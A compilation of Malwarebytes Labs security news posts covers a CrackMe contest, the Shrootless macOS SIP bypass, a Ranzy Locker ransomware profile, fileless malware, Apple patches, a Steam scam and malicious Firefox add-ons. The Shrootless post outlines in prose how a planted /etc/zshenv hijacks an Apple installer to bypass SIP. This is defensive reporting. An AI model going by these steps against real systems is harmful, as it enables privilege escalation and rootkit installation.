IT NEWS

This blog post was authored by Hasherezade

Twice in the past (2017, 2018) we published a Capture-The-Flag challenge dedicated to aspiring malware analysts. Each time it was a Windows executable, containing up to 3 stages to break, in order to get the final flag. The goal of the crackme was to provide an exercise where the contestants will be able to challenge themselves in understanding and overcoming techniques commonly present in real-life malware. Yet we present them on a harmless example.

After a long break, we decided to resume our small contest, and possibly make it an annual event. Without further overdue, we present you the Malwarebytes CrackMe number 3!

Rules of the contest

The rules remain mostly unchanged since the second edition. As before we have two parallel tracks of the contest:

1. The fastest solve. The three earliest submitted flags win. The flag should be submitted along with (minimalist) notes about the steps taken to find it. (No detailed write-up is required.) Any updates about the known winners in this category will be appended to this post.
2. The best write-up. The write-up will be judged by its educational value, clarity, and accuracy. The author should show their method of solving the CrackMe, as well as provide the explanation of the techniques used in the challenge. The write-up submissions closes two weeks after the start of the challenge.

In each track we will select three winners that will be rewarded with unique Malwarebytes swag. The first place winner in each category will additionally get any IT-related book of their choice. All the solvers are going to be listed in our hall of fame.

The flag is in format: flag{...}

Submissions to both contests should be sent as a private message to the Twitter account: @hasherezade.

Three weeks after the challenge started we will publish the closing summary, along with the detailed walk-through, provided by the author.

WARNING: We are sorry, but Malwarebytes employees and people who had the access to the CrackMe before the official publication are not allowed to participate.

The application

The application is a Windows executable. It was tested on Windows 8 and above.

WARNING: please mind the fact that since the CrackMe contains techniques similar to those used in malware, it may be flagged by various AV products. It is a known false-positive. We recommend to run it on a VM, with Windows Defender disabled.

You can download it here.

Best of luck, and have fun!

Hall of fame

We already have the first winner in the category “the fastest solve”:

1. @nazywam

Who will be next?

The post The return of the Malwarebytes CrackMe appeared first on Malwarebytes Labs.

Microsoft researchers have discovered a vulnerability in macOS, dubbed Shrootless, that can allow attackers to bypass System Integrity Protection (SIP) and perform malicious activities, such as gaining root privileges and installing rootkits on vulnerable devices.

Microsoft reported the Shrootless attack to Apple’s security team earlier this year, together with a proof-of-concept that showed how the bug could be abused to install a malicious kernel extension (rootkit).

What is SIP?

SIP which is also known as “rootless” is designed to lock down the system from root by leveraging the Apple sandbox to protect the entire platform. Being able to bypass SIP basically gives the attacker full control of the system, because they can run arbitrary code without the protection kicking in.

Step by step, Apple has hardened SIP over the years against attacks by improving and finetuning the restrictions. One of the most effective SIP restrictions is the filesystem restriction. Without these restrictions, an attacker would be able to access and drop files in an area of the file system that is not intended for application files. The amount of damage an attacker can do to a device’s critical components is directly based on their ability to write unrestricted data to disk.

Since the filesystem restrictions are so powerful, Apple had to implement some exceptions. One of those exceptions is the daemon system_installd, which has the powerful com.apple.rootless.install.inheritable entitlement. With this entitlement, any child process of system_installd would be able to bypass SIP filesystem restrictions altogether.

The vulnerability

The Shrootless vulnerability could be used by an attacker to modify protected parts of the file system by abusing inherited permissions. Microsoft shared its findings with Apple through Coordinated Vulnerability Disclosure (CVD). The vulnerability exists in the macOS Big Sur and Monterey operating systems and was patched by Apple on October 25, 2021.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). Shrootless is listed under  CVE-2021-30892.

The researchers found that during the installation process of a new application, an attacker could hijack the installation process by creating a specially crafted post-installation script and placing it in the location where the installation process looks for the post-installation script.

The gritty details

The method to use this vulnerability is pretty straightforward.

• Download an Apple-signed package (using wget) that is known to have a post-install script. When installing an Apple-signed package (.pkg file), the said package invokes system_installd, which then takes charge of installing the former.
• Plant a malicious /etc/zshenv that would check for its parent process. If it’s system_installd, then it would be able to write to restricted locations. If the package that is being installed contains any post-install scripts, system_installd runs them by invoking a default shell, which is zsh on macOS. Interestingly, when zsh starts, it looks for the file /etc/zshenv, and runs commands from that file automatically, if it exists.
• Invoke the installer utility to install the package. This will invoke system_installd and because we used a package with a post-install script, zsh is invoked and executes the commands in the file we planted.

This way the Shrootless attack bypasses the SIP and effectively gives the attacker root access. As you will understand from this description the attacker will need some access to the system to begin with or they will not be able to plant the necessary /etc/zshenv.

Mitigation

The easiest and best way to avoid falling victim to this vulnerability is to update to macOS Big Sur 11.6.1 or better.

Stay safe, everyone!

The post Shrootless: Microsoft finds Apple macOS vulnerability appeared first on Malwarebytes Labs.

Ranzy Locker ransomware emerged in late 2020, when the variant began to target victims in the United States. According to a flash alert issued by the FBI, unknown cyber criminals using Ranzy Locker ransomware had compromised more than 30 US businesses as of July 2021, including victims in the construction, academic, government, IT, and transportation sectors. Ranzy Locker is a successor of ThunderX and AKO ransomware.

Ransomware-as-a-Service 

The group behind Ranzy Locker is not very different in its business approach from other “big game” ransomware gangs. The ransomware is made available using the Ransomware-as-a-Service (RaaS) model, which allows the developers to profit from cybercriminal affiliates who deploy it against victims. It also runs a leak site where data stolen from victims who refuse to pay a ransom is published.

RDP again, and Exchange

Where the business model is no surprise, the same can be said about the attack methods that Ranzy Locker affiliates deploy to gain initial access. According to the same FBI alert a majority of victims reported that the threat actors conducted brute force attacks targeting Remote Desktop Protocol (RDP) credentials to gain access to the victims’ networks. Recent targets reported the actors leveraged known Microsoft Exchange Server vulnerabilities and phishing as the means of compromising their networks. 

Older, and now less frequent attack methods included malicious spam, and use of the RIG exploit kit, which was previously used to spread Princess ransomware. 

Recognizing Ranzy Locker 

So, how can you tell whether you have been hit by Ranzy Locker or one of the other, many, ransomware variants out there? Well, for starters you can tell from the header of the ransom note which is named readme.txt. 

---=== Ranzy Locker 1.1 ===---

Attention! Your network has been locked.
Your computers and server are locked now.
All encrypted files have extension: .ranzy

---- How to restore my files? ----

All files on each host in your network encrypted with strongest encryption algorithms
Backups are deleted or formatted, do not worry, we can help you restore your files

Files can be decrypted only with private key - this key stored on our servers
You have only one way for return your files back - contact us and receive universal decryption program

Do not worry about guarantees - you can decrypt any 3 files FOR FREE as guarantee

Some variants also use file extensions for the encrypted files that show Ranzy Locker was at work. Those extensions are .RNZ, .ranzy, and .RANZYLOCKED, but there are also some that are less helpful and add a random 6 character string. 

Behavior 

A typical series of actions performed Ranzy Locker ransomware is: 

• Find and delete shadow volume copies, and other recent backups, and disable the Windows recovery environment. 
• Run the encryption process but skip files that have .exe, .dll, .sys, .ini, .lnk, .key, .rdp extensions; and exclude paths with strings including AppData, boot, PerfLogs, PerfBoot, Intel, Microsoft, Windows and Tor Browser. 
• Look for connected machines on the network.
• Drops the ransom note on the desktop of the affected system. 

From what we have noticed, the double-extortion tactic—encrypting and exfiltrating data—is only used on some victims, probably depending on the size of the company and the type of data that was stolen. 

Mitigation 

Based on the behavior of Ranzy Locker, the FBI recommends the following mitigation strategies: 

• Store regular backups of your data off-site and offline, where attackers can’t reach them.
• Implement network segmentation, so that an attacker can’t reach all the machines on your network from one compromised foothold.
• Install and regularly update anti-malware software on all hosts and enable real-time detection. 
• Install security updates for software, operating systems, and firmware as soon as they are released.
• Review domain controllers, servers, workstations, and active directories for new or unrecognized user accounts.  
• Audit user accounts with administrative privileges and configure access controls with least privilege in mind. Do not give all users administrative privileges.
• Disable unused remote access ports and monitor remote access logs for any unusual activity.  
• Consider adding an email banner to emails received from outside your organization.  
• Disable hyperlinks in received emails.
• Use double authentication when logging into accounts or services.

We would like to add Brute Force Protection to that list. 

IOCs 

Besides the characteristics mentioned in this post, the FBI points to a sample YARA rule for Ranzy Locker, which can be found here.

 Stay safe, everyone! 

The post Threat profile: Ranzy Locker ransomware appeared first on Malwarebytes Labs.

Unlike traditional malware, which relies on a file being written to a disk, fileless malware is intended to be memory resident only, ideally leaving no trace after its execution. The malicious payload exists in the computer’s memory, which means nothing is ever written directly to the hard drive.

For an attacker, fileless malware has two major advantages:

• There is no file for traditional anti-virus software to detect.
• There is nothing on the hard drive for forensics to discover.

As a rule, if malware authors can’t avoid detection by security vendors, they at least want to delay it for as long as possible. Which makes fileless malware a step forward in the arms race between malware and security products.

Is fileless malware new?

Fileless malware attacks have been around for 20 years at least. The first malware to be classified as fileless was the Code Red Worm, which ran rampant in 2001, attacking computers running Microsoft’s Internet Information Services (IIS).

But in the last few years fileless attacks have become more prevalent. Four years ago, the Ponemon Institute’s “The State of Endpoint Security Risk Report,” reported that 77 percent of compromised attacks in 2017 were fileless, and that fileless attacks were ten times more likely to succeed. We noted the trend ourselves, with an overview of fileless attacks in 2018.

How is fileless malware delivered?

In the case of the Code Red Worm, the malware exploited a buffer overflow vulnerability that allowed it to write itself directly into memory. Modern ransomware attacks sometimes rely on PowerShell commands that execute code stored on public websites like Pastebin or GitHub.

Fileless malware attacks have also been seen hiding their code inside existing benign files or invisible registry keys. Some use the so-called CactusTorch framework in a malicious document. And sometimes the malicious code does exist on a hard disk, just not on the one that belongs to the affected computer. For example, “USB thief” resides on infected USB devices installed as a plugin in popular portable software. It gathers information on the targeted system and writes that to the USB device.

How to create fileless malware

Our esteemed colleague Vasilios Hioureas has written a walk-through by demonstrating some of his own fileless malware attacks. His write-up also nicely demonstrates what modern anti-malware solutions need to do to protect their users against fileless malware attacks. Showing that modern-day solutions must contain technology to dynamically detect malicious activity on the system rather than simply detecting malicious files. Old-school signature-based detection is useless when dealing with fileless malware.

What can fileless malware do?

In essence, fileless malware can do anything that “regular” malware can do, but for practical reasons you will often see that there is a limited amount of malicious, fileless code. For more complex programs like ransomware, the fileless malware might act as a dropper, which means the first stage downloads and executes the bigger program which is the actual payload. And, of course, fileless malware can use native, legitimate tools built into a system during a cyberattack.

The most common use cases for fileless malware are:

• Initial access. The first step of a cyberattack is to gain a foothold on a system. This can be stealing credentials or exploiting a vulnerability in an access point.
• Harvest credentials. Fileless malware is sometimes used to hunting for credentials, so an attacker can use alternative entry points or elevate their privileges,
• Persistence. To ensure they have permanent access to a compromised system, an attacker might use fileless malware to create a backdoor.
• Data exfiltration. An attacker might use fileless malware to hunt for useful information, such as a victim’s network configuration.
• Dropper and/or payload. A dropper downloads and starts other malware (the payload) on a compromised system. The payload may come as a file, or it can be read from a remote server and loaded into memory directly.

Fileless malware detection

So, how can we find these fileless critters? Behavioral analysis and centralized management are key techniques for detecting and stopping fileless malware attacks. Knowing how to identify attacks and having an overview of the attack surface however is easier said than done.

What you need is anti-malware software that uses behavioral analysis, ideally supported by an Artificial Intelligence (AI) component. And for a large attack surface you will need something like a Security Information Event Management (SIEM) system to tie all the alerts and detections together.

In short, detecting malware is no longer a matter of detecting malicious files, but more and more a matter of detecting malicious behavior.

Stay safe, everyone!

The post What is fileless malware? appeared first on Malwarebytes Labs.

On two consecutive days Apple has released a few important patches. iOS 14.8.1 comes just a month after releasing iOS 14.8 for those who didn’t want to update their iPhones to iOS 15. This update also came as a sort of surprise as it was not beta-tested beforehand.

Earlier this year Apple announced that users would have a choice between updating to iOS 15 as soon as it’s released, or staying on iOS 14 but still receiving important security updates.

Now the differences are starting to show. As you can see in the table below, some patches are specific for 14.8.1 and some are specific for 15.1, while many are shared between them. In total 24 CVEs were covered.

The ones that stood out

Apple is, for understandable reasons, always a bit secretive about what was fixed, but from what we were able to figure out, these are the most worrying ones by type of vulnerability.

Elevation of privileges

CVE-2021-30906: Due to a vulnerability in the iCloud component of watchOS, a local attacker may be able to elevate their privileges. A simple authentication is needed for exploitation.

CVE-2021-30907: Due to a vulnerability in the Audio component of watchOS, a malicious application may be able to elevate privileges. An attack has to be approached locally. A single authentication is needed for exploitation.

Arbitrary code execution

CVE-2021-30881: Due to a vulnerability in the FileProvider component of watchOS, unpacking a maliciously crafted archive may lead to arbitrary code execution. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. It demands that the victim is doing some kind of user interaction.

CVE-2021-30883: Due to a vulnerability in the IOMobileFrameBuffer component of  Apple tvOS, an application may be able to execute arbitrary code with kernel privileges. This issue may have been actively exploited. As previously discussed here.

CVE-2021-30886: Due to a vulnerability in the kernel component of Apple tvOS (Digital Media Player), an application may be able to execute arbitrary code with kernel privileges. Attacking locally is a requirement. A single authentication is required for exploitation.

CVE-2021-30889: Due to a vulnerability in the WebKit component of Apple tvOS, processing maliciously crafted web content may lead to arbitrary code execution. The attack can be launched remotely. The exploitation doesn’t need any form of authentication. It demands that the victim is doing some kind of user interaction.

CVE-2021-30894: Due to a vulnerability in the Image Processing component of the Smartphone OS, an application may be able to execute arbitrary code with kernel privileges. The attack needs to be approached locally. The requirement for exploitation is authentication.

CVE-2021-30900: Due to a vulnerability in the GPU Drivers component of the Smartphone OS, a malicious application may be able to execute arbitrary code with kernel privileges. An attack has to be approached locally. Authentication is required for exploitation.

CVE-2021-30902: Due to a vulnerability in the Voice Control component of the Smartphone OS, a local attacker may be able to cause unexpected application termination or arbitrary code execution. Required for exploitation is a simple authentication.

CVE-2021-30903: Due to a vulnerability in the Continuity Camera component of the Smartphone OS, a local attacker may be able to cause unexpected application termination or arbitrary code execution. The requirement for exploitation is a simple authentication.

CVE-2021-30909: A vulnerability was found in the kernel component of Apple macOS up to 12.0. An application may be able to execute arbitrary code with kernel privileges. Attacking locally is a requirement. The successful exploitation requires a simple authentication.

CVE-2021-30914: Due to a vulnerability in the GPU Drivers component of the Smartphone OS, an application may be able to execute arbitrary code with kernel privileges. Local access is required to approach this attack. A single authentication is necessary for exploitation.

CVE-2021-30916: Due to a vulnerability in the kernel component of the Smartphone OS, a malicious application may be able to execute arbitrary code with kernel privileges. Attacking locally is a requirement. The successful exploitation needs authentication.

CVE-2021-30917: Due to a vulnerability in the ColorSync component of watchOS, processing a maliciously crafted image may lead to arbitrary code execution. The attack may be launched remotely. No form of authentication is required for exploitation. Successful exploitation requires user interaction by the victim.

CVE-2021-30919: Due to a vulnerability in the CoreGraphics component of the Smartphone OS, processing a maliciously crafted PDF may lead to arbitrary code execution. The attack can be launched remotely. The exploitation doesn’t need any form of authentication. It demands that the victim is doing some kind of user interaction.

Mitigation

Apple advises users to update to iOS 15.1 and iPadOS 15.1 or iOS 14.8.1 and iPadOS 14.8.1 which can be done through the automatic update function or iTunes.

Stay safe, everyone!

The post Update now! Apple patches bugs in iOS and iPadOS appeared first on Malwarebytes Labs.

Have you ever had someone run up to you in the street and insist you take their free knife? I hope not, because that’s a good way to wind up in a 60-minute police procedural drama. In video game land, however, anything goes. A certain type of scam is showing signs of activity at the moment and it’s likely to claim some victims before the week is out.

It involves, wait for it: someone digitally running up to you and insisting you take their free knife.

Free knife? What do you mean?

Many games on Steam make use of skins. These are fancy overlays of in-game items. You may not impress someone with your boring old default knife, or gun, or item of clothing. A rare graphical enhancement which makes said item look incredibly distinctive, however? Now you’re talking.

Skins are most commonly traded in-game. Sometimes they’re sold for virtual or real cash, although depending on the game, using real money may be against the terms of service. A few games have their trading systems deeply embedded into game platforms. For example, Steam has its own marketplace for transactions.

Are skins used in scams?

Oh boy, are they ever. One of the oldest scams around is skin phishing. The phisher will create a fake marketplace, or an imitation of a real game-themed lounge, or even just a fake user’s trading inventory page. Account compromise, and/or malware usually follows.

What does this particular scam involve?

It’s a tactic designed to scam people in the fastest way imaginable. What the scammer does can charitably be described as “minimal”. In short, they’ll send a message to potential victims on Steam or on services such as Discord. There are variations in messaging, but the essence remains the same.

“Yo, I don’t know you unfortunately, but this is for you, I do not need that knife [link]”

“I haven’t met you unfortunately (or not lol), but take it, I dont don’t need that skin [link]”

“G’day – I don’t need this bayonet just take it [link]”

Note the similarities in the first and second messages. It’s hard to say if the messages are manually typed out or automated, but we seem to be peeking at the typical indicators of a deliberate decision to try this tactic out.

Once the account is phished, the victim will have to go through Steam support to try and recover it. Accounts can have an awful lot of money tied to them. There may be thousands of dollars worth of titles bound to it. It may have hundreds of dollars in the user’s Steam wallet. There could be a ton of rare items, gifts, and other content sitting in the user’s Inventory page. Pretty much anything in there is at risk once the scammer gets their claws into the account, and account recovery can be rather stressful at the best of times.

How can I keep my Steam account secure?

Steam has a comprehensive list of security tips for its users. They include everything from phishing tips and general safety advice to account verification and two-factor authentication.

As for the free knives, bayonets, and anything else? Leave the mysterious strangers and their too-good-to-be-true murder objects to the crime dramas and keep that police cordon up around your Steam account.

The post Watch out for the Steam skin “free knife” scam appeared first on Malwarebytes Labs.

We talked to members of our Malware Removal Support team and asked them what kind of problems they get asked to solve for our customers.

To understand why they get to handle these questions, it is also necessary to know that the Malwarebytes software is unable to resolve the problems users are facing. Many of these problems can be categorized under the header of trusting the wrong people.

Privacy concerns

You know how it freaks people out when Facebook shows them advertisements for things they have only just thought about buying? Many wonder how Facebook knows this.

They say, “I haven’t searched for the item yet, but here they are showing me this advertisement.”

It gets even worse when people have had a private conversation about it, and they think the advertisers or the platform has been eavesdropping on them.

Most of the time that is not true. So, how do the platforms know what ads to serve you?

• Algorithms are smarter than most people think. Have you heard the story about the family that got coupons for baby cloths and cribs even before their daughter told them she was expecting? We humans are way more predictable than we’d like to think.
• Users of social media and Facebook in particular tend to forget how many people can see the “public” part of their profile and posts.
• Websites share information about your scrolling behavior through cookies, FLoC, and other trackers.

Some people get so convinced they have spyware on their system that they contact our support team to help them get rid of it. All we can do is inform the public and point those looking for help in the right direction.

More Facebook concerns

Besides people not securing their Facebook settings and making everything public, they also make more blatant mistakes like posting their email addresses, clicking on links to surveys in Facebook, clicking on unsolicited links in Messenger, and answering posts that phish for information that makes it easier to guess your passwords.

This comment by one MRS agent during our discussion says a lot:

“I had 2 friends on Facebook today get their profiles taken over because they clicked links they shouldn’t have clicked.”

In cases where these mishaps go wrong, all our Support team can do is tell people they have to contact Facebook as unfortunately we can’t help them.

Other password shenanigans

Another privacy related concern we often get asked about are the sextortion emails that try to intimidate the recipient by telling them the attacker has their password. But that password usually originates from some security breach and the sender has just found it in a data dump somewhere. A quick way to check is a visit to the Have I been Pwned? website.

If you do get an email like this, you should change the password anywhere you use it. And please use Multi-Factor Authentication wherever possible.

Social media and scams

Social media is a perfect way for scammers to reach a lot of people, and we often see them using this to round up victims. There are many kinds of Bitcoin scams to be found on YouTube, Twitter, and other platforms. And along with Tech Support scams, Ponzi schemes, misinformation, and many phishing attempts, you can find every kind of scammer on social media without having to look very hard.

A few more tips

To round this off we assembled a few other mistakes our team sees a lot. So steering clear of these can save you a lot of trouble.

• Letting browsers save their passwords. Use a password manager or password book for them, especially if you are sharing your system with others.
• Never backing up their system. We understand it can be cumbersome, but imagine the misery when you lose access, be it because of ransomware or a hard drive failure.
• Using cracks and keygens. The oldest trick in the book to spread malware is to tell visitors that it is a crack or keygen for a popular game or other software.
• Using torrent software. The same as for cracks and keygens applies here—unless you can verify what you are receiving, don’t download anything from anyone.

Stay safe, everyone!

The post How social media mistakes can impact cybersecurity appeared first on Malwarebytes Labs.

In a Firefox security announcement, Mozilla said 455,000 users have downloaded Firefox add-ons that interfere with how they connect to the internet.

The interference in itself was not the deciding factor, however. The add-ons abused the proxy API to prevent users who had installed them from downloading updates, accessing updated blocklists, and updating remotely configured content.

What is the proxy API?

The proxy API can be used by add-on developers as an event listener to intercept web requests, and return an object that describes whether and how to proxy them. Add-ons that use the proxy API need the “proxy” permission. And where they want to intercept requests, they also need “host” permission for the URLs of intercepted requests.

Google Chrome provides an extension API also called “proxy” which is functionally similar to this API, in that extensions can use it to implement a proxying policy. However, the design of the Chrome API is completely different to this API. They are incompatible, which means using both is NOT recommended as it may result in connectivity issues.

Abuse cases

Mozilla says the add-ons were advertised to users as being able bypass paywall restrictions on websites. It is unknown whether the blocking of updates was intentional and whether the add-ons were performing other malicious actions.

Mozilla has blocked the malicious add-ons so they are not installed by anyone else. Starting with Firefox 91.1, Firefox now includes changes to fall back to direct connections when Firefox makes an important request (such as those for updates) via a proxy configuration that fails. By doing so, users can not be denied important updates.

Mitigation

Mozilla stopped accepting add-on submissions that use the proxy API until fixes were available for all users.

One of those fixes lies in the fact that Mozilla deployed a system add-on named “Proxy Failover” (ID: proxy-failover@mozilla.com) with additional mitigations, and that has been shipped to both current and older Firefox versions. This system add-on implements failover rules for system requests over malfunctioning proxies. In other words, If a proxied system request fails, the proxy configuration in use will be disabled.

As usual, make sure your browser is up to date. The latest version of the Firefox Standard Release for Desktop is at 93.0.

In case you are not running the latest version, and have not disabled updates, you might want to check if you are affected by this issue. First, try updating Firefox manually (In the menu click Settings > on the General tab scroll down to > Firefox Updates > click on the Check for updates button). Recent versions of Firefox come with an updated blocklist that automatically disables the malicious add-ons. So you should be able to get an update.

If that does not work you are advised to check In the Add-ons section, and search for one of the following entries:

• Name: Bypass ID: {7c3a8b88-4dc9-4487-b7f9-736b5f38b957}
• Name: Bypass XM ID: {d61552ef-e2a6-4fb5-bf67-8990f0014957}

Please make sure the ID matches exactly as there might be other, unrelated add-ons using those or similar names. If none of those IDs are shown in the list, you are not affected.

If you do find one of these entries, you can remove the add-on under the Add-ons and themes section of the menu, by clicking on the three horizontal dots and select Remove from the dropdown menu.

Using the proxy API going forward

Developers that wish to use the proxy API for legitimate reasons are asked to include a strict_min_version key in their manifest.json files targeting “91.1” or above. This will make sure that the users will not suffer blocked updates and it will expedite the review for your add-on.

Stay safe everyone

The post Patch now to bypass Firefox add-ons that abuse the proxy API to deny updates appeared first on Malwarebytes Labs.

Last week on Malwarebytes Labs

• Multiple vulnerabilities in popular WordPress plugin WP Fastest Cache.
• “Killware”: Is it just as bad as it sounds?
• REvil ransomware disappears after Tor services hijacked.
• Protect yourself from BlackMatter ransomware: Advice issued.
• q-logger skimmer keeps Magecart attacks going.
• How to delete your Snapchat account.
• High school student rickrolls entire school district, and gets praised.
• Chrome targeted by Magnitude exploit kit.
• Update now! Chrome fixes more security issues.
• A bug is about to confuse a lot of computers by turning back time 20 years.
• We dig into the Game Players Code.
• Ransomware: Why do backups fail when you need them most?

Other cybersecurity news

• Sinclair Broadcast Group says it suffered a ransomware attack and has had data stolen. (Source: NPR)
• After games boom in pandemic, gangs are using phishing and malware to cheat fans. (Source: The Guardian)
• A vulnerability in the trial version of WinRAR has significant consequences for the management of third-party software. (Source: PT Security)
• Slack contains an XSLeak vulnerability that de-anonymizes users. (Source: The Daily Swig)
• Gummy Browsers, a new fingerprint capturing and browser spoofing attack lets attackers spoof tracking profiles. (Source : Bleeping Computer)
• Elaborate CryptoEats food delivery scam steals $500,000 in minutes. (Source: Vice)
• Phishing campaign targets YouTube creators with cookie theft malware. (Source: Google Threat Analysis Group)
• Dutch forensic lab decrypts Tesla’s driving safety data and finds a wealth of information. (Source: The Record)
• Australia announces critical infrastructure reforms to protect the essential infrastructure in the event of a major cyber-attack. (Source: homeaffairs.gov.au)
• Popular NPM library hijacked to install password-stealers and miners. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (Oct 18 – Oct 24) appeared first on Malwarebytes Labs.

“What does online privacy mean to you?”

This beguilingly simply question can produce dozens of overlapping and distinct answers, all depending on who you ask. A VPN service might tell you that online privacy means obscuring your IP address and hiding your Internet activity from your Internet Service Provider. A privacy-forward web browser, like Mozilla, or Brave, might tell you that online privacy means being protected from third-party tracking and surreptitious data collection. And an anti-surveillance activist or lawyer at an organization like the American Civil Liberties Union or Electronic Frontier Foundation might tell you that online privacy means shutting down sweeping surveillance laws in the United States like Section 702 and Section 215.

While Lock and Code has spoken to several guests about online privacy in the past, we wanted to revisit the topic because of its intersection with VPNs, the increasingly popular tools that consumers are using to protect some of their privacy online. We understand the value of a good VPN—our company makes one after all—but we also cannot deny that there is an entire world of online privacy that exists beyond the VPN.

Today, on the Lock and Code podcast with host David Ruiz, we speak to The Tor Project Executive Director Isabella Bagueros about what other types of online tracking users are vulnerable to, even if they’re using a VPN, how else users can stay private online without becoming overwhelmed, and why users should be careful about trusting any one, single VPN.

“One of the issues with VPNs, nowadays, is that they are controlled. It is a private network indeed, because it is controlled and centralized under an organization or company. They literally control all the servers, all the infrastructure that they are providing you, and I think that is one of the things that you want to avoid. You want to avoid having a single point of failure, or a single point of trust.”

Isabella Bagueros, The Tor Project executive director

Tune in to hear all this and more on this week’s Lock and Code podcast, by Malwarebytes labs.

You can also find us on Apple Podcasts, Spotify, and Google Podcasts, plus whatever preferred podcast platform you use.

The post Beyond the VPN: Ultimate online privacy, with The Tor Project’s Isabella Bagueros: Lock and Code S02E20 appeared first on Malwarebytes Labs.